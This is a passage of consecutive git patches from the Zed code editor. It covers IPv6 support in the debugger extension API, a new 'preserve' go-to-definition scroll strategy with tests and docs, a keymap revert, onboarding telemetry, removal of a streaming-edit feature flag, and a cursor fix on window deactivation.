net::{IpAddr, Ipv4Addr, Ipv6Addr}, path::{Path, PathBuf}, str::FromStr, sync::{Arc, OnceLock}, @@ -104,43 +98,66 @@ impl From } } } -impl TryFrom for extension::StartDebuggingRequestArguments { +impl TryFrom for extension::StartDebuggingRequestArguments { type Error = anyhow::Error; - fn try_from(value: StartDebuggingRequestArguments) -> Result { + fn try_from(value: dap::StartDebuggingRequestArguments) -> Result { Ok(Self { configuration: serde_json::from_str(&value.configuration)?, request: value.request.into(), }) } } -impl From for extension::TcpArguments { - fn from(value: TcpArguments) -> Self { +impl From for IpAddr { + fn from(value: dap::IpAddress) -> Self { + match value { + dap::IpAddress::Ipv4((a, b, c, d)) => IpAddr::V4(Ipv4Addr::new(a, b, c, d)), + dap::IpAddress::Ipv6((a, b, c, d, e, f, g, h)) => { + IpAddr::V6(Ipv6Addr::new(a, b, c, d, e, f, g, h)) + } + } + } +} + +impl From for dap::IpAddress { + fn from(value: IpAddr) -> Self { + match value { + IpAddr::V4(v4) => { + let [a, b, c, d] = v4.octets(); + Self::Ipv4((a, b, c, d)) + } + IpAddr::V6(v6) => { + let [a, b, c, d, e, f, g, h] = v6.segments(); + Self::Ipv6((a, b, c, d, e, f, g, h)) + } + } + } +} + +impl From for extension::TcpArguments { + fn from(value: dap::TcpArguments) -> Self { Self { - host: IpAddr::V4(Ipv4Addr::from_bits(value.host)), + host: value.host.into(), port: value.port, timeout: value.timeout, } } } -impl From for TcpArgumentsTemplate { +impl From for dap::TcpArgumentsTemplate { fn from(value: extension::TcpArgumentsTemplate) -> Self { Self { - host: value.host.and_then(|addr| match addr { - IpAddr::V4(v4) => Some(v4.to_bits()), - IpAddr::V6(_) => None, - }), + host: value.host.map(Into::into), port: value.port, timeout: value.timeout, } } } -impl From for extension::TcpArgumentsTemplate { - fn from(value: TcpArgumentsTemplate) -> Self { +impl From for extension::TcpArgumentsTemplate { + fn from(value: dap::TcpArgumentsTemplate) -> Self { Self { - host: value.host.map(|bits| IpAddr::V4(Ipv4Addr::from_bits(bits))), + host: value.host.map(Into::into), port: value.port, timeout: value.timeout, } @@ -238,11 +255,11 @@ impl TryFrom for extension::DebugAdapterBinary { } } -impl From for extension::BuildTaskDefinition { - fn from(value: BuildTaskDefinition) -> Self { +impl From for extension::BuildTaskDefinition { + fn from(value: dap::BuildTaskDefinition) -> Self { match value { - BuildTaskDefinition::ByName(name) => Self::ByName(name.into()), - BuildTaskDefinition::Template(build_task_template) => Self::Template { + dap::BuildTaskDefinition::ByName(name) => Self::ByName(name.into()), + dap::BuildTaskDefinition::Template(build_task_template) => Self::Template { task_template: build_task_template.template.into(), locator_name: build_task_template.locator_name.map(SharedString::from), }, @@ -250,14 +267,14 @@ impl From for extension::BuildTaskDefinition { } } -impl From for BuildTaskDefinition { +impl From for dap::BuildTaskDefinition { fn from(value: extension::BuildTaskDefinition) -> Self { match value { extension::BuildTaskDefinition::ByName(name) => Self::ByName(name.into()), extension::BuildTaskDefinition::Template { task_template, locator_name, - } => Self::Template(BuildTaskDefinitionTemplatePayload { + } => Self::Template(dap::BuildTaskDefinitionTemplatePayload { template: task_template.into(), locator_name: locator_name.map(String::from), }), @@ -901,27 +918,19 @@ impl context_server::Host for WasmState {} impl dap::Host for WasmState { async fn resolve_tcp_template( &mut self, - template: TcpArgumentsTemplate, - ) -> wasmtime::Result> { + template: dap::TcpArgumentsTemplate, + ) -> wasmtime::Result> { maybe!(async { let (host, port, timeout) = ::dap::configure_tcp_connection(task::TcpArgumentsTemplate { port: template.port, - host: template - .host - .map(|bits| IpAddr::V4(Ipv4Addr::from_bits(bits))), + host: template.host.map(Into::into), timeout: template.timeout, }) .await?; - let host_bits = match host { - IpAddr::V4(v4) => v4.to_bits(), - IpAddr::V6(_) => { - anyhow::bail!("IPv6 addresses are not supported in the extension API") - } - }; - Ok(TcpArguments { + Ok(dap::TcpArguments { port, - host: host_bits, + host: host.into(), timeout, }) }) From 7632cc3cc287c97288c563cad223967c1fa0d194 Mon Sep 17 00:00:00 2001 From: Dino Date: Wed, 29 Apr 2026 08:29:15 +0100 Subject: [PATCH 090/231] editor: Add preserve scroll strategy for go to definition (#55036) These changes attempt to expand on the work introduced by https://github.com/zed-industries/zed/pull/54778 by introducing a new `GoToDefinitionScrollStrategy::Preserve` variant that attempts to keep the cursor at the same vertical offset within the viewport when navigating to a definition. Most of the machinery for this was already in place. To support cases where the user's scroll position isn't snapped to an exact display row, for example, after scrolling with the mmouse, `Autoscroll::TopRelative` and `Autoscroll::BottomRelative` were updated from `usize` to `ScrollOffset`, allowing fractional offsets. When the cursor is offscreen at the moment the `editor: go to definition` action is invoked, `Preserve` falls back to `Autoscroll::center`, matching the existing default for `go_to_definition_scroll_strategy`. This avoids attempting to preserve an offset where the cursor isn't visible which would lead to the cursor being offscreen when jumping to the definition. Documentation has also been updated to reflect this new strategy value. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Relates to #52173 Release Notes: - Added a new `preserve` option to `go_to_definition_scroll_strategy` that keeps the cursor at the same vertical position within the viewport when navigating to a definition --- assets/settings/default.json | 2 + crates/editor/src/editor.rs | 49 ++++- crates/editor/src/editor_tests.rs | 238 ++++++++++++++++++++++++- crates/editor/src/element.rs | 4 +- crates/editor/src/scroll/autoscroll.rs | 27 +-- crates/repl/src/session.rs | 2 +- crates/settings_content/src/editor.rs | 3 + docs/src/reference/all-settings.md | 9 + 8 files changed, 312 insertions(+), 22 deletions(-) diff --git a/assets/settings/default.json b/assets/settings/default.json index 464587e6290b2f..02d93ece4a3f73 100644 --- a/assets/settings/default.json +++ b/assets/settings/default.json @@ -361,6 +361,8 @@ // 1. Vertically center the target in the viewport: `center` (default) // 2. Scroll the minimum amount needed to make the target visible: `minimum` // 3. Scroll so the target appears near the top of the viewport: `top` + // 4. Preserve the cursor's vertical position within the viewport, falling back to `center` when the cursor is + // offscreen: `preserve` "go_to_definition_scroll_strategy": "center", // Which level to use to filter out diagnostics displayed in the editor. // diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index ee6b2be18b8590..42e4ebb606dfed 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -18340,7 +18340,11 @@ impl Editor { }; let anchor_range = range.to_anchors(&multibuffer.snapshot(cx)); self.change_selections( - SelectionEffects::scroll(Autoscroll::for_go_to_definition(cx)).nav_history(true), + SelectionEffects::scroll(Autoscroll::for_go_to_definition( + self.cursor_top_offset(cx), + cx, + )) + .nav_history(true), window, cx, |s| s.select_anchor_ranges([anchor_range]), @@ -19146,8 +19150,11 @@ impl Editor { } editor.change_selections( - SelectionEffects::scroll(Autoscroll::for_go_to_definition(cx)) - .nav_history(true), + SelectionEffects::scroll(Autoscroll::for_go_to_definition( + editor.cursor_top_offset(cx), + cx, + )) + .nav_history(true), window, cx, |s| s.select_anchor_ranges(target_ranges), @@ -19163,6 +19170,8 @@ impl Editor { return Navigated::No; }; let pane = workspace.read(cx).active_pane().clone(); + let offset = editor.cursor_top_offset(cx); + window.defer(cx, move |window, cx| { let (target_editor, target_pane): (Entity, Entity) = workspace.update(cx, |workspace, cx| { @@ -19226,8 +19235,10 @@ impl Editor { } target_editor.change_selections( - SelectionEffects::scroll(Autoscroll::for_go_to_definition(cx)) - .nav_history(true), + SelectionEffects::scroll(Autoscroll::for_go_to_definition( + offset, cx, + )) + .nav_history(true), window, cx, |s| s.select_anchor_ranges(target_ranges), @@ -19507,7 +19518,10 @@ impl Editor { let Range { start, end } = locations[destination_location_index]; editor.update_in(cx, |editor, window, cx| { - let effects = SelectionEffects::scroll(Autoscroll::for_go_to_definition(cx)); + let effects = SelectionEffects::scroll(Autoscroll::for_go_to_definition( + editor.cursor_top_offset(cx), + cx, + )); editor.unfold_ranges(&[start..end], false, false, cx); editor.change_selections(effects, window, cx, |s| { @@ -25672,7 +25686,7 @@ impl Editor { } let autoscroll = match scroll_offset { Some(scroll_offset) => { - Autoscroll::top_relative(scroll_offset as usize) + Autoscroll::top_relative(scroll_offset as ScrollOffset) } None => Autoscroll::newest(), }; @@ -26747,6 +26761,27 @@ impl Editor { self.refresh_runnables(None, window, cx); } } + + /// Returns the current cursor's vertical offset, in display rows, from the + /// top of the visible viewport. + /// Returns `None` if the cursor is not currently on screen. + pub fn cursor_top_offset(&self, cx: &mut Context) -> Option { + let visible = self.visible_line_count()?; + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let scroll_top = self.scroll_manager.scroll_position(&display_map, cx).y; + let cursor_display_row = self + .selections + .newest::(&display_map) + .head() + .to_display_point(&display_map) + .row() + .as_f64(); + + match cursor_display_row - scroll_top { + offset if offset < 0.0 || offset >= visible => None, + offset => Some(offset), + } + } } fn edit_for_markdown_paste<'a>( diff --git a/crates/editor/src/editor_tests.rs b/crates/editor/src/editor_tests.rs index 3a23bb1147b152..b0ea1b86740939 100644 --- a/crates/editor/src/editor_tests.rs +++ b/crates/editor/src/editor_tests.rs @@ -49,9 +49,9 @@ use project::{ use serde_json::{self, json}; use settings::{ AllLanguageSettingsContent, DelayMs, EditorSettingsContent, GlobalLspSettingsContent, - IndentGuideBackgroundColoring, IndentGuideColoring, InlayHintSettingsContent, - ProjectSettingsContent, ScrollBeyondLastLine, SearchSettingsContent, SettingsContent, - SettingsStore, + GoToDefinitionScrollStrategy, IndentGuideBackgroundColoring, IndentGuideColoring, + InlayHintSettingsContent, ProjectSettingsContent, ScrollBeyondLastLine, SearchSettingsContent, + SettingsContent, SettingsStore, }; use std::{borrow::Cow, sync::Arc}; use std::{cell::RefCell, future::Future, rc::Rc, sync::atomic::AtomicBool, time::Instant}; @@ -2962,6 +2962,102 @@ async fn test_autoscroll(cx: &mut TestAppContext) { }); } +#[gpui::test] +async fn test_autoscroll_relative(cx: &mut TestAppContext) { + init_test(cx, |_| {}); + let mut cx = EditorTestContext::new(cx).await; + + let line_height = cx.update_editor(|editor, window, cx| { + editor.set_vertical_scroll_margin(0, cx); + editor + .style(cx) + .text + .line_height_in_pixels(window.rem_size()) + }); + let window = cx.window; + + // Resize the window such that only 6 lines of text fit on screen. + cx.simulate_window_resize(window, size(px(1000.), 6. * line_height)); + + cx.set_state( + r#"ˇone + two + three + four + five + six + seven + eight + nine + ten + eleven + twelve + thirteen + fourteen + fifteen + "#, + ); + cx.update_editor(|editor, window, cx| { + assert_eq!( + editor.snapshot(window, cx).scroll_position(), + gpui::Point::new(0., 0.0) + ); + }); + + // Placing the cursor at row 7 with a top-relative autoscroll of 2 display + // rows, should land the scroll position's y coordinate at 5.0 (7 - 2). + cx.update_editor(|editor, window, cx| { + editor.change_selections( + SelectionEffects::scroll(Autoscroll::top_relative(2.0)), + window, + cx, + |selections| selections.select_ranges([Point::new(7, 0)..Point::new(7, 0)]), + ); + }); + cx.update_editor(|editor, window, cx| { + assert_eq!( + editor.snapshot(window, cx).scroll_position(), + gpui::Point::new(0., 5.0) + ); + }); + + // Seeing as fractional offsets are supported, with the cursor at row 10 and + // a top-relative autoscroll of 2.5 display rows, the scroll position's y + // coordinate lands at 7.5 (10 - 2.5). + cx.update_editor(|editor, window, cx| { + editor.change_selections( + SelectionEffects::scroll(Autoscroll::top_relative(2.5)), + window, + cx, + |selections| selections.select_ranges([Point::new(10, 0)..Point::new(10, 0)]), + ); + }); + cx.update_editor(|editor, window, cx| { + assert_eq!( + editor.snapshot(window, cx).scroll_position(), + gpui::Point::new(0., 7.5) + ); + }); + + // When the requested offset would scroll past the top of the buffer, + // `scroll_position.y` is clamped to 0 rather than going negative. + cx.update_editor(|editor, window, cx| { + editor.change_selections( + SelectionEffects::scroll(Autoscroll::top_relative(4.0)), + window, + cx, + |selections| selections.select_ranges([Point::new(1, 0)..Point::new(1, 0)]), + ); + }); + + cx.update_editor(|editor, window, cx| { + assert_eq!( + editor.snapshot(window, cx).scroll_position(), + gpui::Point::new(0., 0.0) + ); + }); +} + #[gpui::test] async fn test_exclude_overscroll_margin_clamps_scroll_position(cx: &mut TestAppContext) { init_test(cx, |_| {}); @@ -26371,6 +26467,142 @@ async fn test_goto_definition_contained_ranges(cx: &mut TestAppContext) { assert_eq!(navigated, Navigated::Yes); } +#[gpui::test] +async fn test_goto_definition_preserve_scroll_strategy(cx: &mut TestAppContext) { + init_test(cx, |_| {}); + update_test_editor_settings(cx, &|settings| { + settings.go_to_definition_scroll_strategy = Some(GoToDefinitionScrollStrategy::Preserve); + settings.vertical_scroll_margin = Some(0.0); + }); + + let mut cx = EditorLspTestContext::new_rust( + lsp::ServerCapabilities { + definition_provider: Some(lsp::OneOf::Left(true)), + ..lsp::ServerCapabilities::default() + }, + cx, + ) + .await; + + let window = cx.window; + let line_height = cx.update_editor(|editor, window, cx| { + editor + .style(cx) + .text + .line_height_in_pixels(window.rem_size()) + }); + cx.simulate_window_resize(window, size(px(1000.), 8. * line_height)); + + // Build a buffer where `target` is defined on row 10 and called from + // row 20, with the cursor placed on the call site. + let buffer = indoc! { " + // 0 + // 1 + // 2 + // 3 + // 4 + // 5 + // 6 + // 7 + // 8 + // 9 + fn target() // 10 + // 11 + // 12 + // 13 + // 14 + // 15 + // 16 + // 17 + // 18 + // 19 + fn caller() { ˇtarget(); } // 20 + // 21 + // 22 + // 23 + // 24 + // 25 + // 26 + // 27 + // 28 + // 29 + // 30 + "}; + + // Mock the response from the LSP server when requesting to go to a + // definition so as to always jump to the `target` function. + cx.set_request_handler::(|url, _, _| async move { + Ok(Some(lsp::GotoDefinitionResponse::Scalar(lsp::Location { + uri: url.clone(), + range: lsp::Range::new(lsp::Position::new(10, 3), lsp::Position::new(10, 9)), + }))) + }); + + let caller_row = 20.0; + let target_row = 10.0; + let offset = 1.5; + let center_offset = cx.update_editor(|editor, _, _| { + editor + .visible_line_count() + .map(|count| ((count - 1.0) / 2.0).floor()) + .expect("Visible line count should be available") + }); + + // When the cursor is visible inside the viewport, going to a definition + // should preserve that same offset value. + // In this case, with the cursor set at row 20 and the scroll position set + // to 18.5 (20 - 1.5), when going to the definition of `target` in row 10, + // the scroll position should end up at 8.5 (10 - 1.5), so as to preserve + // that same offset of 1.5. + cx.set_state(&buffer); + cx.update_editor(|editor, window, cx| { + editor.set_scroll_position(gpui::Point::new(0.0, caller_row - offset), window, cx); + }); + cx.update_editor(|editor, window, cx| editor.go_to_definition(&GoToDefinition, window, cx)) + .await + .expect("Failed to navigate to definition"); + cx.run_until_parked(); + cx.update_editor(|editor, window, cx| { + assert_eq!( + editor.snapshot(window, cx).scroll_position(), + gpui::Point::new(0.0, target_row - offset), + ); + }); + + // In the case where the cursor ends up outside of the visible viewport, the + // scroll position's offset should be ignored and the center of the viewport + // should be used instead. + // Since the cursor is jumping to row 10, the scroll position's y coordinate + // should end up at 10 minus the offset from the center of the viewport. + cx.set_state(&buffer); + cx.update_editor(|editor, window, cx| { + editor.set_scroll_position(gpui::Point::new(0.0, 0.0), window, cx); + let snapshot = editor.display_snapshot(cx); + let cursor_row = editor + .selections + .newest_display(&snapshot) + .start + .row() + .as_f64(); + let visible_lines = editor + .visible_line_count() + .expect("Visible line count should be available"); + + assert!(cursor_row >= visible_lines, "Cursor should be offscreen"); + }); + + cx.update_editor(|editor, window, cx| editor.go_to_definition(&GoToDefinition, window, cx)) + .await + .expect("Failed to navigate to definition"); + cx.run_until_parked(); + cx.update_editor(|editor, window, cx| { + assert_eq!( + editor.snapshot(window, cx).scroll_position(), + gpui::Point::new(0.0, (target_row - center_offset).max(0.0)), + ); + }); +} + #[gpui::test] async fn test_find_all_references_editor_reuse(cx: &mut TestAppContext) { init_test(cx, |_| {}); diff --git a/crates/editor/src/element.rs b/crates/editor/src/element.rs index 4b719b1474d38d..a6be884058ef52 100644 --- a/crates/editor/src/element.rs +++ b/crates/editor/src/element.rs @@ -6814,7 +6814,9 @@ impl EditorElement { .display_snapshot .display_point_to_anchor(point_for_position.nearest_valid, Bias::Left); editor.change_selections( - SelectionEffects::scroll(Autoscroll::top_relative(line_index)), + SelectionEffects::scroll(Autoscroll::top_relative( + line_index as ScrollOffset, + )), window, cx, |selections| { diff --git a/crates/editor/src/scroll/autoscroll.rs b/crates/editor/src/scroll/autoscroll.rs index 38f0f4b022899f..6bdb60a470e8f8 100644 --- a/crates/editor/src/scroll/autoscroll.rs +++ b/crates/editor/src/scroll/autoscroll.rs @@ -36,11 +36,14 @@ impl Autoscroll { /// Returns the autoscroll strategy configured for navigation to definitions /// and references, based on `go_to_definition_scroll_strategy`. - pub fn for_go_to_definition(cx: &App) -> Self { + pub fn for_go_to_definition(offset: Option, cx: &App) -> Self { match EditorSettings::get_global(cx).go_to_definition_scroll_strategy { GoToDefinitionScrollStrategy::Center => Self::center(), GoToDefinitionScrollStrategy::Minimum => Self::fit(), GoToDefinitionScrollStrategy::Top => Self::focused(), + GoToDefinitionScrollStrategy::Preserve => { + offset.map(Self::top_relative).unwrap_or_else(Self::center) + } } } @@ -50,9 +53,10 @@ impl Autoscroll { Self::Strategy(AutoscrollStrategy::Focused, None) } - /// Scrolls so that the newest cursor is roughly an n-th line from the top. - pub fn top_relative(n: usize) -> Self { - Self::Strategy(AutoscrollStrategy::TopRelative(n), None) + /// Scrolls so that the newest cursor is the given offset (in display rows) + /// from the top of the viewport. + pub fn top_relative(offset: ScrollOffset) -> Self { + Self::Strategy(AutoscrollStrategy::TopRelative(offset), None) } /// Scrolls so that the newest cursor is at the top. @@ -60,9 +64,10 @@ impl Autoscroll { Self::Strategy(AutoscrollStrategy::Top, None) } - /// Scrolls so that the newest cursor is roughly an n-th line from the bottom. - pub fn bottom_relative(n: usize) -> Self { - Self::Strategy(AutoscrollStrategy::BottomRelative(n), None) + /// Scrolls so that the newest cursor is the given offset (in display rows) + /// from the bottom of the viewport. + pub fn bottom_relative(offset: ScrollOffset) -> Self { + Self::Strategy(AutoscrollStrategy::BottomRelative(offset), None) } /// Scrolls so that the newest cursor is at the bottom. @@ -91,7 +96,7 @@ impl Into for Option { } } -#[derive(Debug, PartialEq, Eq, Default, Clone, Copy)] +#[derive(Debug, PartialEq, Default, Clone, Copy)] pub enum AutoscrollStrategy { Fit, Newest, @@ -100,10 +105,12 @@ pub enum AutoscrollStrategy { Focused, Top, Bottom, - TopRelative(usize), - BottomRelative(usize), + TopRelative(ScrollOffset), + BottomRelative(ScrollOffset), } +impl Eq for AutoscrollStrategy {} + impl AutoscrollStrategy { fn next(&self) -> Self { match self { diff --git a/crates/repl/src/session.rs b/crates/repl/src/session.rs index 384913844845aa..9b7bd759504623 100644 --- a/crates/repl/src/session.rs +++ b/crates/repl/src/session.rs @@ -795,7 +795,7 @@ impl Session { if move_down { editor.update(cx, move |editor, cx| { editor.change_selections( - SelectionEffects::scroll(Autoscroll::top_relative(8)), + SelectionEffects::scroll(Autoscroll::top_relative(8.0)), window, cx, |selections| { diff --git a/crates/settings_content/src/editor.rs b/crates/settings_content/src/editor.rs index 18a7bd5fd497ce..5c0dd939688326 100644 --- a/crates/settings_content/src/editor.rs +++ b/crates/settings_content/src/editor.rs @@ -831,6 +831,9 @@ pub enum GoToDefinitionScrollStrategy { Minimum, /// Scroll so the target appears near the top of the viewport. Top, + /// Preserve the cursor's vertical position within the viewport, falling + /// back to centering when the cursor is offscreen. + Preserve, } /// Determines when the mouse cursor should be hidden in an editor or input box. diff --git a/docs/src/reference/all-settings.md b/docs/src/reference/all-settings.md index c6c33b8b5edd0d..f175d51a398d63 100644 --- a/docs/src/reference/all-settings.md +++ b/docs/src/reference/all-settings.md @@ -2456,6 +2456,15 @@ Example: } ``` +4. Preserve the cursor's vertical position within the viewport, falling back to + `center` when the cursor is offscreen. + +```json [settings] +{ + "go_to_definition_scroll_strategy": "preserve" +} +``` + ## Hard Tabs - Description: Whether to indent lines using tab characters or multiple spaces. From 9bdb53f35ab0d08d4c249976b9479c69491f8ad7 Mon Sep 17 00:00:00 2001 From: Conrad Irwin Date: Wed, 29 Apr 2026 09:33:12 +0200 Subject: [PATCH 091/231] Revert "Enable Vim/Helix keybindings when the base keymap is set to None" (#55144) Reverts zed-industries/zed#54899 Release notes: - Reverted the "none" keymap to be literally nothing --- crates/zed/src/zed.rs | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/crates/zed/src/zed.rs b/crates/zed/src/zed.rs index 2b1ff93581c20e..6d1a9c176f1193 100644 --- a/crates/zed/src/zed.rs +++ b/crates/zed/src/zed.rs @@ -2074,16 +2074,16 @@ fn reload_keymaps(cx: &mut App, mut user_key_bindings: Vec) { pub fn load_default_keymap(cx: &mut App) { let base_keymap = *BaseKeymap::get_global(cx); - if base_keymap != BaseKeymap::None { - cx.bind_keys( - KeymapFile::load_asset(DEFAULT_KEYMAP_PATH, Some(KeybindSource::Default), cx).unwrap(), - ); + if base_keymap == BaseKeymap::None { + return; + } - if let Some(asset_path) = base_keymap.asset_path() { - cx.bind_keys( - KeymapFile::load_asset(asset_path, Some(KeybindSource::Base), cx).unwrap(), - ); - } + cx.bind_keys( + KeymapFile::load_asset(DEFAULT_KEYMAP_PATH, Some(KeybindSource::Default), cx).unwrap(), + ); + + if let Some(asset_path) = base_keymap.asset_path() { + cx.bind_keys(KeymapFile::load_asset(asset_path, Some(KeybindSource::Base), cx).unwrap()); } if VimModeSetting::get_global(cx).0 || vim_mode_setting::HelixModeSetting::get_global(cx).0 { From d95ef5ffc56f49e372211976479bb8369e56053a Mon Sep 17 00:00:00 2001 From: Katie Geer Date: Wed, 29 Apr 2026 00:44:06 -0700 Subject: [PATCH 092/231] onboarding: Telemetry for new AI setup buttons (#55145) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [ x] Unsafe blocks (if any) have justifying comments - [ x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ n/a] Tests cover the new/changed behavior - [ n/a] Performance impact has been considered and is acceptable Release Notes: - N/A --------- Co-authored-by: Zed Zippy <234243425+zed-zippy[bot]@users.noreply.github.com> --- crates/onboarding/src/basics_page.rs | 5 +++- crates/onboarding/src/onboarding.rs | 37 ++++++++++++++++++++++++++++ 2 files changed, 41 insertions(+), 1 deletion(-) diff --git a/crates/onboarding/src/basics_page.rs b/crates/onboarding/src/basics_page.rs index 4817e897f7715d..7d021c54447666 100644 --- a/crates/onboarding/src/basics_page.rs +++ b/crates/onboarding/src/basics_page.rs @@ -528,7 +528,8 @@ fn render_import_settings_section(tab_index: &mut isize, cx: &mut App) -> impl I .child(h_flex().gap_1().child(vscode).child(cursor)) } -const FEATURED_AGENT_IDS: &[&str] = &["claude-acp", "codex-acp", "github-copilot-cli", "cursor"]; +pub(crate) const FEATURED_AGENT_IDS: &[&str] = + &["claude-acp", "codex-acp", "github-copilot-cli", "cursor"]; fn render_registry_agent_button( agent: &RegistryAgent, @@ -565,6 +566,7 @@ fn render_registry_agent_button( .state(state_element) .disabled(installed) .on_click(move |_, _, cx| { + telemetry::event!("Welcome Agent Install Clicked", agent = agent_id.as_str()); let agent_id = agent_id.clone(); update_settings_file(fs.clone(), cx, move |settings, _| { let agent_servers = settings.agent_servers.get_or_insert_default(); @@ -645,6 +647,7 @@ fn render_zed_agent_button(user_store: &Entity, cx: &mut App) -> impl }) } else { this.on_click(move |_, _, cx| { + telemetry::event!("Welcome Zed Agent Sign In Clicked"); let client = Client::global(cx); cx.spawn(async move |cx| client.sign_in_with_optional_connect(true, cx).await) .detach_and_log_err(cx); diff --git a/crates/onboarding/src/onboarding.rs b/crates/onboarding/src/onboarding.rs index ce9a383a606f4d..652febbda49481 100644 --- a/crates/onboarding/src/onboarding.rs +++ b/crates/onboarding/src/onboarding.rs @@ -1,5 +1,6 @@ use crate::multibuffer_hint::MultibufferHint; use client::{Client, UserStore, zed_urls}; +use cloud_api_types::Plan; use db::kvp::KeyValueStore; use fs::Fs; use gpui::{ @@ -8,6 +9,7 @@ use gpui::{ Subscription, Task, WeakEntity, Window, actions, }; use notifications::status_toast::StatusToast; +use project::agent_server_store::AllAgentServersSettings; use schemars::JsonSchema; use serde::Deserialize; use settings::{SettingsStore, VsCodeSettingsSource}; @@ -216,6 +218,41 @@ impl Onboarding { fn new(workspace: &Workspace, cx: &mut App) -> Entity { let font_family_cache = theme::FontFamilyCache::global(cx); + let installed_agents = cx + .global::() + .get::(None) + .clone(); + let client = Client::global(cx); + let status = *client.status().borrow(); + let plan = workspace.user_store().read(cx).plan(); + let zed_agent_state = if status.is_signed_out() + || matches!( + status, + client::Status::AuthenticationError | client::Status::ConnectionError + ) { + "signed_out" + } else if status.is_signing_in() { + "signing_in" + } else { + match plan { + Some(Plan::ZedPro) => "pro", + Some(Plan::ZedProTrial) => "trial", + Some(Plan::ZedBusiness) => "business", + Some(Plan::ZedStudent) => "student", + Some(Plan::ZedFree) | None => "free", + } + }; + let agents_installed = basics_page::FEATURED_AGENT_IDS + .iter() + .filter(|id| installed_agents.contains_key(**id)) + .copied() + .collect::>(); + telemetry::event!( + "Welcome Agent Setup Viewed", + zed_agent = zed_agent_state, + agents_installed = agents_installed, + ); + cx.new(|cx| { cx.spawn(async move |this, cx| { font_family_cache.prefetch(cx).await; From 45151e61d083edfb0d06d4b9ccbe0f234439bc8a Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Wed, 29 Apr 2026 10:43:56 +0200 Subject: [PATCH 093/231] agent: Remove streaming edit feature flag (#55152) We already enabled the feature flag, but that only applies to logged in users. Going to make sure that everyone gets the new tool as long as the model supports it. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - agent: Improve edit tool performance for models that support streaming tool calls. --- crates/agent/src/tests/edit_file_thread_test.rs | 5 ----- crates/agent/src/thread.rs | 7 ++----- crates/feature_flags/src/flags.rs | 12 ------------ 3 files changed, 2 insertions(+), 22 deletions(-) diff --git a/crates/agent/src/tests/edit_file_thread_test.rs b/crates/agent/src/tests/edit_file_thread_test.rs index 3efd7753740bc8..7e6d131c98fca2 100644 --- a/crates/agent/src/tests/edit_file_thread_test.rs +++ b/crates/agent/src/tests/edit_file_thread_test.rs @@ -210,11 +210,6 @@ async fn test_streaming_edit_json_parse_error_does_not_cause_unsaved_changes( super::init_test(cx); super::always_allow_tools(cx); - // Enable the streaming edit file tool feature flag. - cx.update(|cx| { - cx.update_flags(true, vec!["streaming-edit-file-tool".to_string()]); - }); - let fs = FakeFs::new(cx.executor()); fs.insert_tree( path!("/project"), diff --git a/crates/agent/src/thread.rs b/crates/agent/src/thread.rs index 07e6facb1fba89..7b3eab5d03f9f2 100644 --- a/crates/agent/src/thread.rs +++ b/crates/agent/src/thread.rs @@ -8,9 +8,7 @@ use crate::{ }; use acp_thread::{MentionUri, UserMessageId}; use action_log::ActionLog; -use feature_flags::{ - FeatureFlagAppExt as _, StreamingEditFileToolFeatureFlag, UpdatePlanToolFeatureFlag, -}; +use feature_flags::{FeatureFlagAppExt as _, UpdatePlanToolFeatureFlag}; use agent_client_protocol::schema as acp; use agent_settings::{ @@ -2867,8 +2865,7 @@ impl Thread { } } - let use_streaming_edit_tool = - cx.has_flag::() && model.supports_streaming_tools(); + let use_streaming_edit_tool = model.supports_streaming_tools(); let mut tools = self .tools diff --git a/crates/feature_flags/src/flags.rs b/crates/feature_flags/src/flags.rs index aae8137a0a6e9d..b23f8dbc56a7fc 100644 --- a/crates/feature_flags/src/flags.rs +++ b/crates/feature_flags/src/flags.rs @@ -47,18 +47,6 @@ impl FeatureFlag for DiffReviewFeatureFlag { } register_feature_flag!(DiffReviewFeatureFlag); -pub struct StreamingEditFileToolFeatureFlag; - -impl FeatureFlag for StreamingEditFileToolFeatureFlag { - const NAME: &'static str = "streaming-edit-file-tool"; - type Value = PresenceFlag; - - fn enabled_for_staff() -> bool { - true - } -} -register_feature_flag!(StreamingEditFileToolFeatureFlag); - pub struct UpdatePlanToolFeatureFlag; impl FeatureFlag for UpdatePlanToolFeatureFlag { From 56ee590588026a1f364b9a70822b2334459a5a9c Mon Sep 17 00:00:00 2001 From: Agus Zubiaga Date: Wed, 29 Apr 2026 11:31:24 +0200 Subject: [PATCH 094/231] gpui: Restore mouse cursor on window deactivation (#55155) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- crates/gpui/src/window.rs | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/crates/gpui/src/window.rs b/crates/gpui/src/window.rs index 99374fd042ecd0..ad8bb0f735d5d4 100644 --- a/crates/gpui/src/window.rs +++ b/crates/gpui/src/window.rs @@ -1457,6 +1457,10 @@ impl Window { move |active| { handle .update(&mut cx, |_, window, cx| { + if !active { + cx.platform.set_cursor_style(CursorStyle::Arrow); + } + window.active.set(active); window.modifiers = window.platform_window.modifiers(); window.capslock = window.platform_window.capslock(); From 70d1450eeffb7e310d4488b4158c797ab2b83ce6 Mon Sep 17 00:00:00 2001 From: Conrad Irwin Date: Wed, 29 Apr 2026 11:40:38 +0200 Subject: [PATCH 095/231] Don't auto-release first preview (even if it's not .0) (#55166) Self-Review Checklist: - [ ] I've reviewed 